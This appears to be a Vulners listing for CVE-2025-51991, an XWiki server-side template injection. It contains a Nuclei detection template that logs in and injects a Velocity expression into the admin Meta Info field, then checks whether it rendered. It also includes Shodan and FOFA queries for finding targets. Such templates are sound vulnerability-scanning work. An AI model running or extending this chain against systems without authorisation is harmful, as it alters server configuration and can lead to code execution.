| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the HTTP Meta Info field in the administration interface of the XWiki Platform allows a attacker to execute Server Side Template Injection (SSTI) attacks. | 28 Oct 202500:00 | – | bdu_fstec | |
| CVE-2025-51991 | 13 Nov 202500:35 | – | circl | |
| XWiki Platform 安全漏洞 | 20 Aug 202500:00 | – | cnnvd | |
| CVE-2025-51991 | 20 Aug 202500:00 | – | cve | |
| CVE-2025-51991 | 20 Aug 202500:00 | – | cvelist | |
| EUVD-2025-25310 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-51991 | 20 Aug 202515:15 | – | nvd | |
| CVE-2025-51991 | 20 Aug 202500:00 | – | osv | |
| PT-2025-34072 | 20 Aug 202500:00 | – | ptsecurity | |
| CVE-2025-51991 | 22 Aug 202500:22 | – | redhatcve |
id: CVE-2025-51991
info:
name: XWiki <= 17.3.0 - Server-Side Template Injection (SSTI)
author: 0x_Akoko
severity: critical
description: |
XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic.
impact: |
Authenticated administrators can execute arbitrary template logic, potentially exposing internal server information or enabling remote code execution.
remediation: |
Update to a version later than 17.3.0 or the latest available version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-51991
- https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51991.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2025-51991
epss-score: 0.03366
epss-percentile: 0.87307
cwe-id: CWE-94
metadata:
max-request: 5
verified: true
vendor: xwiki
product: xwiki
shodan-query: http.html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: xwiki,ssti,template-injection,authenticated
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET /bin/login/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: login_token
internal: true
regex:
- 'name="form_token" value="([^"]+)"'
group: 1
- raw:
- |
POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(location, '/bin/view/Main/')
condition: and
internal: true
- raw:
- |
GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin§ion=Presentation HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: form_token
internal: true
regex:
- 'data-xwiki-form-token="([^"]+)"'
group: 1
- raw:
- |
POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D7%2A7%29%24x&XWiki.XWikiPreferences_0_webcopyright=&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
- raw:
- |
GET /bin/view/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("XWikiPreferences\"[^>]*>\\s*49\\s*<", body)'
condition: and
# digest: 4a0a004730450220149391b50efe59dd08c0f5b88fcbde55b4ee929212160193747e1f2462b47a59022100b06114bbaf9c7e223bc94ea14a666612f6906c4ee98874425dbe394325761522:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation